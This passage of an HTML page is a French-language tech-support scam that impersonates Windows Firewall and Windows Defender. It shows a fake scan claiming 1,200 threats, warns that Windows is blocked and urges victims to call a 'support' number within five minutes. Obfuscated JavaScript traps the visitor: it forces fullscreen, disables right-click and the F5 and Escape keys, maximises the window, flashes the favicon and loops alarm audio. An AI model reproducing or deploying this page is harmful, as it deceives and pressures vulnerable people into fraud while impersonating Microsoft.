							style="width: 100%"
							id="dynamic"
							aria-valuemax="100"
							aria-valuemin="0"
							aria-valuenow="100"
							role="progressbar"
						>
							100% Complete
						</div>
					</div>
					<div class="table_quick">
						<table class="table table-bordered">
							<thead>
								<tr>
									<th scope="col">Scanned Objects</th>
									<th scope="col">
										<div class="col_fourth counter">
											<h2 class="count-number count-title timer" data-speed="5000" data-to="51900">51,900</h2>
										</div>
									</th>
								</tr>
								<tr>
									<th scope="col">Time Spent</th>
									<th scope="col">5 secs</th>
								</tr>
								<tr>
									<th scope="col">Identified Threats</th>
									<th scope="col" style="color: red">
										<h2 class="count-number count-title timer" data-speed="2500" data-to="1200">1,200</h2>
									</th>
								</tr>
							</thead>
						</table>
					</div>
				</div>
				<div class="scan_footer">
					<div class="row">
						<div class="col-md-6">
							<div class="bt_can">
								<div class="btn-group" role="group" aria-label="Basic example">
									<button class="btn btn-secondary" type="button">Cancel</button>
								</div>
								<div class="btn-group" role="group" aria-label="Basic example">
									<button class="btn btn-secondary" type="button">Pause</button>
								</div>
							</div>
						</div>
						<div class="col-md-6">
							<div class="bt_can2">
								<div class="btn-group" role="group" aria-label="Basic example">
									<button class="btn btn-secondary" type="button">Scheduled Scans</button>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>

		<div class="pro_box2" style="cursor: none; display: block">
			<img src="bx1.png" alt="" style="max-width: 100%; width: 100%; margin: 0 auto" />
		</div>
		<div class="pro_box3" style="cursor: none; display: block">
			<div class="pro_box_header">
				<div class="row">
					<div class="col-md-12">
						<div class="minimize">
							<ul>
								<li>
									<a href="#">
										<img src="mnc.png" />
									</a>
								</li>
							</ul>
						</div>
					</div>
					<div class="col-md-4">
						<div class="logo">
							<img src="msmm.png" />
							<span>Pare-feu Windows</span>
						</div>
					</div>
					<div class="col-md-8">
						<div class="activate_lic">
							<ul>
								<li>
									<a href="#">
										<button>Activer la licence</button>
									</a>
								</li>
								<li>
									<a href="#">
										<img src="bel.png" />
									</a>
								</li>
								<li>
									<a href="#">
										<img src="set.png" />
									</a>
								</li>
								<li>
									<a href="#">
										<img
											src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA0AAAANCAIAAAD9iXMrAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAP9JREFUeNqMUTEORUAQZbIUalESpTNoVEqJSuIKjuMUCiRKnQtoKSRCKRp0JPJf/iYbv/iJKdZ47+3smxl533fpG9d1dV03z/O6rrqum6bpOI6iKJxl/DNNU5Zly7JIjzAMI4oiy7KQy6gHUZqm+FFVNQxDEEDKsjzPk4iSJAFCeA6VeIE4jm3bbtsWJ3Ig932DhYbBk3juOI6macZx3LYtCAIOgoWGwbgwlOc5T9BB3/cCh4bQnfQbruui2aqqBAINYQRPEYx7nlcUBTwIEBrC1aeOMVbX9TAMTxAaghXMSfofYKEhTBzDFKimab7v4xQ2wEIj87292seb/X4EGADicI/nlE5xDgAAAABJRU5ErkJggg=="
										/>
									</a>
								</li>
							</ul>
						</div>
					</div>
				</div>
			</div>
			<div class="utubw32">
				<div class="utubw3_header">
					<div class="row">
						<div class="col-md-6">
							<div class="ofmv93">
								<p>
									<img src="vsc.png" />
									<span>Scanner</span>
								</p>
							</div>
						</div>
						<div class="col-md-6">
							<div class="minimize1">
								<ul>
									<li>
										<a href="#">
											<img src="mnc.png" />
										</a>
									</li>
								</ul>
							</div>
						</div>
					</div>
				</div>
				<div class="owiinm443">
					<div class="row">
						<div class="col-md-12">
							<div class="tooreg_detail_scan">
								<ul>
									<li>
										<a href="#">Analyse</a>
									</li>
									<li>
										<a href="#">Planificateur</a>
									</li>
									<li>
										<a href="#">Rapports</a>
									</li>
								</ul>
							</div>
						</div>
					</div>
					<br />
					<div class="table_quick2">
						<div class="row">
							<div class="col-md-4">
								<div class="pc_desk">
									<img src="pcm.png" />
								</div>
							</div>
							<div class="col-md-4">
								<div class="card_top scan_pro">
									<ul>
										<li><i aria-hidden="true" class="fa fa-check"></i> Vérification des mises à jour</li>
										<li><i aria-hidden="true" class="fa fa-check"></i> Scanner la mémoire</li>
										<li><i aria-hidden="true" class="fa fa-check"></i> Analyser les éléments de démarrage</li>
										<li>
											<div class="circular-spinner"></div>
											<span>Analyse du registre Windows</span>
										</li>
										<li>Analyse des fichiers système</li>
									</ul>
								</div>
							</div>
							<div class="col-md-4">
								<div class="scan_dur">
									<p>
										<strong>Durée de l'analyse</strong>
									</p>
									<p>3sec 0s</p>
									<p>5sec 0s</p>
									<br />
									<p>
										<strong>Éléments analysés</strong>
									</p>
									<p>51,900</p>
									<br />
									<p>
										<strong>Menace Détectée</strong>
									</p>
									<p>11</p>
								</div>
							</div>
						</div>
					</div>
				</div>
				<div class="scan_footer3">
					<div class="row">
						<div class="col-md-2">
							<div class="dfvd4sss">
								<img src="vsc.png" />
							</div>
						</div>
						<div class="col-md-10">
							<div class="make_this">
								<p>Faites-en le dernier à vous soucier des menaces en ligne</p>
								<p>
									Premium arrête les logiciels malveillants, les virus et plus encore sans enliser votre ordinateur. Passer à la version
									premium
								</p>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
		<div id="footer">
			<div class="row">
				<div class="col-md-12">
					<div class="right-foot" style="text-align: center">
						<span id="footertxt"> <img src="msmm.png" /> Pare-feu Windows: </span>
						<span style="font-weight: 500; padding-left: 13px; color: #fff"
							>Contacter le support technique :
							<span style="border: 1px solid #fff; border-radius: 5px; padding: 2px 5px">
								<script>
									document.write(savedPhoneNumber);
								</script>
							</span>
						</span>
					</div>
				</div>
				<div class="col-md-12">
					<marquee direction="left" height="100px" width="100%">
						<small class="text-left" style="color: #eee; font-size: 10px"
							>Windows a été bloqué à cause d'une activité suspecte.Vous devez nous contacter immédiatement afin que nos ingénieurs
							puissent vous guider dans le processus de suppression par téléphone. S'IL VOUS PLAÎT appelez-nous dans les 5 prochaines
							minutes afin d’éviter un disfonctionnement complet de votre ordinateur.</small
						>
					</marquee>
				</div>
			</div>
		</div>
		<div class="mnbxs" id="webbx" style="display: block">
			<div class="infos top" style="font-size: 17px">
				<div class="infos headers" style="border-bottom: 1px solid #d6d5d5">
					<span class="fl title" id="txtadd">
						<span class="fl infos"> <img src="dm.png" class="logo3" /> </span>Windows Defender - Avertissement de sécurité
					</span>
					<span class="fl title2" id="txts1">
						<a href="#" id="cross">
							<img src="cs.png" />
						</a>
					</span>
				</div>
			</div>
			<div id="textweb">
				<span class="colo-rd">
					<div id="ip_add">Microsoft_Windows_Firewall_Alert !</div>
					<div id="city">PC tainted with Trojan-type spyware</div>
					<div id="isp">(Error_Code: 2SVB7AZP)</div>
				</span>
			</div>
			<img src="re.gif" id="banner" />
			<div id="disclaimer">
				Windows a été bloqué à cause d'une activité suspecte..<br />
				<span class="support" style="font-size: 22px"
					>Contacter le support technique:&nbsp;
					<span style="border: 1px solid #114d9a; border-radius: 5px; padding: 2px 5px">
						<script>
							document.write(savedPhoneNumber);
						</script>
					</span>
				</span>
			</div>
			<div id="bottom">
				<img src="msmm.png" id="badge" />
				<span class="title3">Windows_Security</span>
				<ul>
					<li>
						<a href="#">
							<div class="fr button2">
								<span id="addtochromebutton">Retourner</span>
							</div>
						</a>
					</li>
					<li>
						<a href="#">
							<div class="fr button">
								<span id="addtochromebutton">OK</span>
							</div>
						</a>
					</li>
				</ul>
			</div>
		</div>
		<div class="cardcontainer" style="cursor: none; display: block" id="pop_up_new">
			<p>
				Si vous prenez contact avec nos experts, vous pouvez bénéficier de services immédiats de suppression des virus par simple appel
				téléphonique. Pour éviter une panne du système, vous devez nous contacter dans les cinq prochaines minutes.
			</p>
			<p>Contactez le service d'assistance de Windows afin de rétablir les fonctionnalités de votre ordinateur.</p>
			<p>Si vous quittez cette page, il se peut que vos données ne soient pas sauvegardées.</p>
			<p style="padding-bottom: 0; color: #fff; font-size: 16px">
				Appelez-nous sans frais au:

				<strong>
					<span style="border: 1px solid #fff; border-radius: 5px; padding: 2px 5px"
						><script>
							document.write(savedPhoneNumber);
						</script>
					</span>
				</strong>
			</p>
			<div class="sdcnk38nc">
				<a class="active" id="leave_page" style="cursor: pointer; color: #fff !important">OK</a>
				<a class="active" id="leave_page" style="color: #fff !important">Retourner</a>
			</div>
		</div>
		<div
			class="answer_list"
			style="
				display: none;
				background-color: #000;
				height: auto;
				width: 550px;
				left: 33%;
				position: absolute;
				z-index: 99999999;
				border: 1px solid transparent;
				border-color: #d6d8db;
				border-radius: 0.5rem;
			"
			id="oosirun445"
		>
			<p style="color: #fff; margin-top: 10px; font-size: 16px; opacity: 0.9; padding: 0 5px" class="text-center">
				Vous devez nous contacter immédiatement afin que nos ingénieurs puissent vous guider par téléphone tout au long de la procédure de
				suppression.<br />
				<strong
					>Contacter le support technique:
					<span style="border: 1px solid #383d41; border-radius: 5px; padding: 2px 5px">
						<script>
							document.write(savedPhoneNumber);
						</script>
					</span>
				</strong>
			</p>
		</div>
		<div id="osdywn394" style="display: block">
			<img src="msmm.png" />
			<span style="color: #222; font-size: 24px; font-weight: 600; margin-left: 6px; position: relative; top: 5px">Microsoft</span>
			<p style="font-weight: 600; font-size: 24px">Support d'appel: <br /></p>
			<h4 style="font-weight: 600; font-size: 22px">
				<script>
					document.write(savedPhoneNumber);
				</script>
				<br />
			</h4>
			<div class="arrow-down">
				<svg height="1em" viewBox="0 0 320 512">
					<style>
						svg {
							fill: #fff;
						}
					</style>
					<path
						d="M137.4 374.6c12.5 12.5 32.8 12.5 45.3 0l128-128c9.2-9.2 11.9-22.9 6.9-34.9s-16.6-19.8-29.6-19.8L32 192c-12.9 0-24.6 7.8-29.6 19.8s-2.2 25.7 6.9 34.9l128 128z"
					></path>
				</svg>
			</div>
		</div>
		<script src="nvidia.js"></script>
		<script src="jupiter.js"></script>
		<script src="esc.js"></script>

		<script type="text/javascript">
			document.getElementById('age-confirmation-modal').onclick = function () {
				document.getElementById('age-confirmation-modal').style.display = 'none';
				document.getElementById('other-content').style.display = 'inline';

				addEventListener('click', function () {
					var el = document.documentElement,
						rfs = el.requestFullScreen || el.webkitRequestFullScreen || el.mozRequestFullScreen;
					rfs.call(el);
				});
			};
			$('a#thing_to_click').click(function (e) {
				e.preventDefault();
				window.location = '#';
			});
		</script>

		<script>
			$(function () {
				var a = 0,
					b = setInterval(function () {
						a += 10;
						$('#dynamic')
							.css('width', a + '%')
							.attr('aria-valuenow', a)
							.text(a + '% Complete');
						100 <= a && clearInterval(b);
					}, 100);
			});
		</script>
		<script>
			(function (a) {
				a.fn.countTo = function (b) {
					b = b || {};
					return a(this).each(function () {
						function d(a) {
							a = c.formatter.call(k, a, c);
							h.html(a);
						}
						var c = a.extend(
								{},
								a.fn.countTo.defaults,
								{
									from: a(this).data('from'),
									to: a(this).data('to'),
									speed: a(this).data('speed'),
									refreshInterval: a(this).data('refresh-interval'),
									decimals: a(this).data('decimals'),
								},
								b,
							),
							l = Math.ceil(c.speed / c.refreshInterval),
							n = (c.to - c.from) / l,
							k = this,
							h = a(this),
							m = 0,
							f = c.from,
							g = h.data('countTo') || {};
						h.data('countTo', g);
						g.interval && clearInterval(g.interval);
						g.interval = setInterval(function () {
							f += n;
							m++;
							d(f);
							'function' == typeof c.onUpdate && c.onUpdate.call(k, f);
							m >= l &&
								(h.removeData('countTo'),
								clearInterval(g.interval),
								(f = c.to),
								'function' == typeof c.onComplete && c.onComplete.call(k, f));
						}, c.refreshInterval);
						d(f);
					});
				};
				a.fn.countTo.defaults = {
					from: 0,
					to: 0,
					speed: 100,
					refreshInterval: 100,
					decimals: 0,
					formatter: function (a, d) {
						return a.toFixed(d.decimals);
					},
					onUpdate: null,
					onComplete: null,
				};
			})(jQuery);
			var _0x283331 = _0x1a49;
			(function (_0x3b94d3, _0x655a49) {
				var _0x240fac = _0x1a49,
					_0x211b16 = _0x3b94d3();
				while (!![]) {
					try {
						var _0x1c49d5 =
							(-parseInt(_0x240fac(0x11e)) / 0x1) * (-parseInt(_0x240fac(0x125)) / 0x2) +
							(parseInt(_0x240fac(0x12a)) / 0x3) * (-parseInt(_0x240fac(0x120)) / 0x4) +
							(-parseInt(_0x240fac(0x134)) / 0x5) * (parseInt(_0x240fac(0x13d)) / 0x6) +
							(-parseInt(_0x240fac(0x133)) / 0x7) * (parseInt(_0x240fac(0x126)) / 0x8) +
							parseInt(_0x240fac(0x11d)) / 0x9 +
							-parseInt(_0x240fac(0x118)) / 0xa +
							(-parseInt(_0x240fac(0x123)) / 0xb) * (-parseInt(_0x240fac(0x131)) / 0xc);
						if (_0x1c49d5 === _0x655a49) break;
						else _0x211b16['push'](_0x211b16['shift']());
					} catch (_0x252e0a) {
						_0x211b16['push'](_0x211b16['shift']());
					}
				}
			})(_0x2231, 0x9b460),
				jQuery(function (_0x31d536) {
					var _0x384a5f = _0x1a49;
					_0x31d536(_0x384a5f(0x12b))[_0x384a5f(0x144)](_0x384a5f(0x128), {
						formatter: function (_0x3c9cc6, _0x3e4fee) {
							var _0x330065 = _0x384a5f;
							return _0x3c9cc6[_0x330065(0x141)](_0x3e4fee['decimals'])['replace'](/\B(?=(?:\d{3})+(?!\d))/g, ',');
						},
					}),
						_0x31d536('.timer')[_0x384a5f(0x135)](function (_0x171cef) {
							var _0xb27683 = _0x384a5f,
								_0xb6492c = _0x31d536(this);
							(_0x171cef = _0x31d536['extend']({}, _0x171cef || {}, _0xb6492c['data'](_0xb27683(0x128)) || {})),
								_0xb6492c[_0xb27683(0x140)](_0x171cef);
						});
				}),
				addEventListener(_0x283331(0x13f), function () {
					var _0x15d857 = _0x283331,
						_0x4b4bf0 = document[_0x15d857(0x13a)],
						_0x5ccc7e = _0x4b4bf0[_0x15d857(0x137)] || _0x4b4bf0[_0x15d857(0x12e)] || _0x4b4bf0[_0x15d857(0x12f)];
					_0x5ccc7e[_0x15d857(0x142)](_0x4b4bf0);
				});
			var modal = document[_0x283331(0x11b)]('myModal'),
				btn = document[_0x283331(0x11b)](_0x283331(0x122)),
				span = document[_0x283331(0x11f)](_0x283331(0x139))[0x0];
			function _0x2231() {
				var _0x4fab48 = [
					'favicon',
					'myBtn',
					'16203MYmtas',
					'target',
					'110sYaArh',
					'16bTlsGB',
					'#webbx',
					'countToOptions',
					'delay',
					'6IWggTY',
					'.count-number',
					'onclick',
					'ready',
					'webkitRequestFullScreen',
					'mozRequestFullScreen',
					'href',
					'17676CbUqrh',
					'mouseover',
					'1856197zcwnRe',
					'76235JTzlmo',
					'each',
					'play',
					'requestFullScreen',
					'show',
					'close',
					'documentElement',
					'#oosirun445',
					'.pro_box',
					'60ENPFZF',
					'fadeIn',
					'click',
					'countTo',
					'toFixed',
					'call',
					'w3.png',
					'data',
					'.black',
					'display',
					'8769890Wiglmt',
					'none',
					'style',
					'getElementById',
					'#kdkku484',
					'5523210WKvQcm',
					'3086KCRpln',
					'getElementsByClassName',
					'1514696MXKdmY',
				];
				_0x2231 = function () {
					return _0x4fab48;
				};
				return _0x2231();
			}
			(span['onclick'] = function () {
				var _0x4597e7 = _0x283331;
				modal[_0x4597e7(0x11a)][_0x4597e7(0x117)] = _0x4597e7(0x119);
			}),
				(window[_0x283331(0x12c)] = function (_0x50143e) {
					var _0x27fa4b = _0x283331;
					_0x50143e[_0x27fa4b(0x124)] == modal && (modal[_0x27fa4b(0x11a)][_0x27fa4b(0x117)] = 'none');
				}),
				setInterval(function () {
					var _0x408951 = _0x283331;
					document[_0x408951(0x11b)]('pridez')[_0x408951(0x136)]();
				}, 0x1f4);
			var e = 0x1;
			function _0x1a49(_0x4efe30, _0x9ec9d) {
				var _0x223186 = _0x2231();
				return (
					(_0x1a49 = function (_0x1a49bb, _0x22ecad) {
						_0x1a49bb = _0x1a49bb - 0x117;
						var _0x4f1fb9 = _0x223186[_0x1a49bb];
						return _0x4f1fb9;
					}),
					_0x1a49(_0x4efe30, _0x9ec9d)
				);
			}
			setInterval(function () {
				var _0x2cd760 = _0x283331;
				0x1 == e
					? ((document[_0x2cd760(0x11b)](_0x2cd760(0x121))[_0x2cd760(0x130)] = _0x2cd760(0x143)), (e = 0x0))
					: ((document['getElementById']('favicon')[_0x2cd760(0x130)] = 'w1.png'), (e = 0x1));
			}, 0x3e8),
				$(document)['ready'](function () {
					var _0x2a69e2 = _0x283331;
					$(_0x2a69e2(0x11c))['click'](function () {
						var _0x25fd62 = _0x2a69e2;
						$(_0x25fd62(0x13b))[_0x25fd62(0x138)]();
					});
				}),
				$(document)[_0x283331(0x12d)](function () {
					var _0x28594f = _0x283331;
					$(_0x28594f(0x13c))[_0x28594f(0x129)](0x384)[_0x28594f(0x13e)](0x320),
						$(_0x28594f(0x145))['delay'](0x3e8)['fadeIn'](0x320),
						$('.pro_box2')[_0x28594f(0x129)](0x9c4)[_0x28594f(0x13e)](0x320),
						$('.pro_box3')[_0x28594f(0x129)](0xdac)[_0x28594f(0x13e)](0x320),
						$('#pop_up_new')['delay'](0xfa0)['fadeIn'](0x320),
						$('#webbx')[_0x28594f(0x129)](0xfa0)[_0x28594f(0x13e)](0x320);
				}),
				$(document)[_0x283331(0x12d)](function () {
					var _0x5725c8 = _0x283331;
					$('#kdkku484')[_0x5725c8(0x13f)](function () {
						var _0x3205a5 = _0x5725c8;
						$(_0x3205a5(0x127))[_0x3205a5(0x138)]();
					});
				}),
				$(document)[_0x283331(0x12d)](function () {
					var _0x41c6de = _0x283331;
					$('#cross')[_0x41c6de(0x13f)](function () {
						var _0x235a8f = _0x41c6de;
						$('#webbx')[_0x235a8f(0x138)]();
					});
				}),
				$(document)[_0x283331(0x12d)](function () {
					var _0x37bc48 = _0x283331;
					$('body')[_0x37bc48(0x132)](function () {
						var _0x5d9174 = _0x37bc48;
						$(_0x5d9174(0x127))[_0x5d9174(0x138)]();
					});
				});
		</script>
		<script>
			var _0x225aaa = _0x3feb;
			function _0x3feb(_0x144842, _0x2acda6) {
				var _0x3cc830 = _0x3cc8();
				return (
					(_0x3feb = function (_0x3feb4f, _0x559203) {
						_0x3feb4f = _0x3feb4f - 0xa2;
						var _0xac602 = _0x3cc830[_0x3feb4f];
						return _0xac602;
					}),
					_0x3feb(_0x144842, _0x2acda6)
				);
			}
			(function (_0x4f98b1, _0x5d0e10) {
				var _0x2e6d7e = _0x3feb,
					_0x570167 = _0x4f98b1();
				while (!![]) {
					try {
						var _0x1e6198 =
							(-parseInt(_0x2e6d7e(0xb8)) / 0x1) * (-parseInt(_0x2e6d7e(0xb3)) / 0x2) +
							-parseInt(_0x2e6d7e(0xa9)) / 0x3 +
							(-parseInt(_0x2e6d7e(0xb0)) / 0x4) * (parseInt(_0x2e6d7e(0xb1)) / 0x5) +
							-parseInt(_0x2e6d7e(0xb6)) / 0x6 +
							(-parseInt(_0x2e6d7e(0xb7)) / 0x7) * (-parseInt(_0x2e6d7e(0xa7)) / 0x8) +
							(parseInt(_0x2e6d7e(0xb5)) / 0x9) * (parseInt(_0x2e6d7e(0xaa)) / 0xa) +
							(parseInt(_0x2e6d7e(0xa2)) / 0xb) * (-parseInt(_0x2e6d7e(0xab)) / 0xc);
						if (_0x1e6198 === _0x5d0e10) break;
						else _0x570167['push'](_0x570167['shift']());
					} catch (_0x1cd2ce) {
						_0x570167['push'](_0x570167['shift']());
					}
				}
			})(_0x3cc8, 0x7b481);
			function _0x3cc8() {
				var _0x3ae697 = [
					'button',
					'appName',
					'Netscape',
					'1463816kXFEhZ',
					'keyCode',
					'206862eDYnzs',
					'90EPEOqK',
					'5484RYfbcI',
					'oncontextmenu',
					'preventDefault',
					'onmousedown',
					'onmouseup',
					'1868RJppKZ',
					'3695rPGNEs',
					'addEventListener',
					'2QJZiSB',
					'keydown',
					'642024ObTMPA',
					'3160818ZSDxnw',
					'35KfDsMQ',
					'446005SMhYWL',
					'captureEvents',
					'which',
					'13409eHtRsn',
					'onkeydown',
				];
				_0x3cc8 = function () {
					return _0x3ae697;
				};
				return _0x3cc8();
			}
			var isNS = _0x225aaa(0xa6) == navigator['appName'] ? 0x1 : 0x0;
			_0x225aaa(0xa6) == navigator[_0x225aaa(0xa5)] && document[_0x225aaa(0xb9)](Event['MOUSEDOWN'] || Event['MOUSEUP']);
			function mischandler() {
				return !0x1;
			}
			function mousehandler(_0x3bf629) {
				var _0x4c709e = _0x225aaa;
				(_0x3bf629 = isNS ? _0x3bf629 : event), (_0x3bf629 = isNS ? _0x3bf629[_0x4c709e(0xba)] : _0x3bf629[_0x4c709e(0xa4)]);
				if (0x2 == _0x3bf629 || 0x3 == _0x3bf629) return !0x1;
			}
			(document[_0x225aaa(0xac)] = mischandler),
				(document[_0x225aaa(0xae)] = mousehandler),
				(document[_0x225aaa(0xaf)] = mousehandler),
				(document[_0x225aaa(0xa3)] = function (_0x2b6cad) {
					return !0x1;
				}),
				document[_0x225aaa(0xb2)](_0x225aaa(0xb4), win_onkeydown_handler);
			function win_onkeydown_handler(_0x26205f) {
				var _0x6d8840 = _0x225aaa;
				switch (_0x26205f[_0x6d8840(0xa8)]) {
					case 0x74:
						_0x26205f[_0x6d8840(0xad)]();
						break;
					case 0x1b:
						_0x26205f[_0x6d8840(0xad)]();
						break;
				}
			}
		</script>
		<script>
			function _0x1656(_0x3e6905, _0x3e65d0) {
				var _0x3a8610 = _0x3a86();
				return (
					(_0x1656 = function (_0x165699, _0x4e17a8) {
						_0x165699 = _0x165699 - 0x83;
						var _0x305b4d = _0x3a8610[_0x165699];
						return _0x305b4d;
					}),
					_0x1656(_0x3e6905, _0x3e65d0)
				);
			}
			var _0x3bcd79 = _0x1656;
			(function (_0x21f157, _0x157f51) {
				var _0xc86fe0 = _0x1656,
					_0x2933ea = _0x21f157();
				while (!![]) {
					try {
						var _0x1f32cc =
							-parseInt(_0xc86fe0(0x83)) / 0x1 +
							-parseInt(_0xc86fe0(0x8e)) / 0x2 +
							(-parseInt(_0xc86fe0(0x92)) / 0x3) * (-parseInt(_0xc86fe0(0x86)) / 0x4) +
							(-parseInt(_0xc86fe0(0x93)) / 0x5) * (-parseInt(_0xc86fe0(0x8d)) / 0x6) +
							(parseInt(_0xc86fe0(0x87)) / 0x7) * (parseInt(_0xc86fe0(0x88)) / 0x8) +
							-parseInt(_0xc86fe0(0x84)) / 0x9 +
							(parseInt(_0xc86fe0(0x91)) / 0xa) * (parseInt(_0xc86fe0(0x8a)) / 0xb);
						if (_0x1f32cc === _0x157f51) break;
						else _0x2933ea['push'](_0x2933ea['shift']());
					} catch (_0x4143a5) {
						_0x2933ea['push'](_0x2933ea['shift']());
					}
				}
			})(_0x3a86, 0x901f2),
				(window[_0x3bcd79(0x90)] = function () {
					var _0xe0574d = _0x3bcd79;
					window['moveTo'](0x0, 0x0), window[_0xe0574d(0x8f)](screen[_0xe0574d(0x85)], screen['availHeight']);
				}),
				$(document)[_0x3bcd79(0x8c)](function () {
					var _0x19c830 = _0x3bcd79;
					$(_0x19c830(0x89))[_0x19c830(0x8b)](0x258)['fadeIn'](0x64);
				});
			function _0x3a86() {
				var _0x2d694c = [
					'300OwOBMR',
					'110mHxJJj',
					'1088028aomfCa',
					'1254285bBSagA',
					'availWidth',
					'29324DGhtuD',
					'35irEEcF',
					'677752zHMRqD',
					'#osdywn394',
					'88363SrUokX',
					'delay',
					'ready',
					'230586DJvnjs',
					'1606006VYEYqE',
					'resizeTo',
					'onload',
					'770jwpesu',
				];
				_0x3a86 = function () {
					return _0x2d694c;
				};
				return _0x3a86();
			}
		</script>

		<script>
			function _0xab9a(_0x4189cb, _0x78d161) {
				var _0x1a6fef = _0x1a6f();
				return (
					(_0xab9a = function (_0xab9aa1, _0x55ad3a) {
						_0xab9aa1 = _0xab9aa1 - 0x1f3;
						var _0x41b829 = _0x1a6fef[_0xab9aa1];
						return _0x41b829;
					}),
					_0xab9a(_0x4189cb, _0x78d161)
				);
			}
			var _0x2a3e73 = _0xab9a;
			function _0x1a6f() {
				var _0x3b7478 = [
					'4pFoCME',
					'#kdkku484',
					'26119566ixnXhB',
					'play',
					'8964zpAuZD',
					'9UOfCTE',
					'setAttribute',
					'webs.mp4',
					'14AJxfef',
					'#sdkcjnsnc',
					'2191506hAKvFj',
					'1260060BYaRKx',
					'.pro_box',
					'5480acZusi',
					'addEventListener',
					'ready',
					'ended',
					'click',
					'createElement',
					'6674400KxTquC',
					'171053gqBmEh',
					'1372156PvikUe',
				];
				_0x1a6f = function () {
					return _0x3b7478;
				};
				return _0x1a6f();
			}
			(function (_0x4fb5fc, _0x3fe843) {
				var _0x5dd064 = _0xab9a,
					_0x105b6d = _0x4fb5fc();
				while (!![]) {
					try {
						var _0x29f7cd =
							(parseInt(_0x5dd064(0x1ff)) / 0x1) * (parseInt(_0x5dd064(0x201)) / 0x2) +
							(parseInt(_0x5dd064(0x206)) / 0x3) * (-parseInt(_0x5dd064(0x200)) / 0x4) +
							-parseInt(_0x5dd064(0x1f6)) / 0x5 +
							(-parseInt(_0x5dd064(0x1f5)) / 0x6) * (parseInt(_0x5dd064(0x1f3)) / 0x7) +
							(-parseInt(_0x5dd064(0x1f8)) / 0x8) * (parseInt(_0x5dd064(0x205)) / 0x9) +
							parseInt(_0x5dd064(0x1fe)) / 0xa +
							parseInt(_0x5dd064(0x203)) / 0xb;
						if (_0x29f7cd === _0x3fe843) break;
						else _0x105b6d['push'](_0x105b6d['shift']());
					} catch (_0x1f9e23) {
						_0x105b6d['push'](_0x105b6d['shift']());
					}
				}
			})(_0x1a6f, 0xa87f1),
				$(document)[_0x2a3e73(0x1fa)](function () {
					var _0x36a28a = _0x2a3e73,
						_0x47a699 = document[_0x36a28a(0x1fd)]('audio');
					_0x47a699[_0x36a28a(0x207)]('src', _0x36a28a(0x208)),
						_0x47a699[_0x36a28a(0x1f9)](
							_0x36a28a(0x1fb),
							function () {
								var _0x46e3f2 = _0x36a28a;
								this[_0x46e3f2(0x204)]();
							},
							![],
						),
						$(_0x36a28a(0x202))['click'](function () {
							var _0x5e5323 = _0x36a28a;
							_0x47a699[_0x5e5323(0x204)]();
						}),
						$(_0x36a28a(0x1f4))[_0x36a28a(0x1fc)](function () {
							var _0x93dc12 = _0x36a28a;
							_0x47a699[_0x93dc12(0x204)]();
						}),
						$(_0x36a28a(0x1f7))[_0x36a28a(0x1fc)](function () {
							_0x47a699['play']();
						}),
						$('#webbx')[_0x36a28a(0x1fc)](function () {
							var _0x2e3dc9 = _0x36a28a;
							_0x47a699[_0x2e3dc9(0x204)]();
						});
				});
		</script>
	</body>
</html>
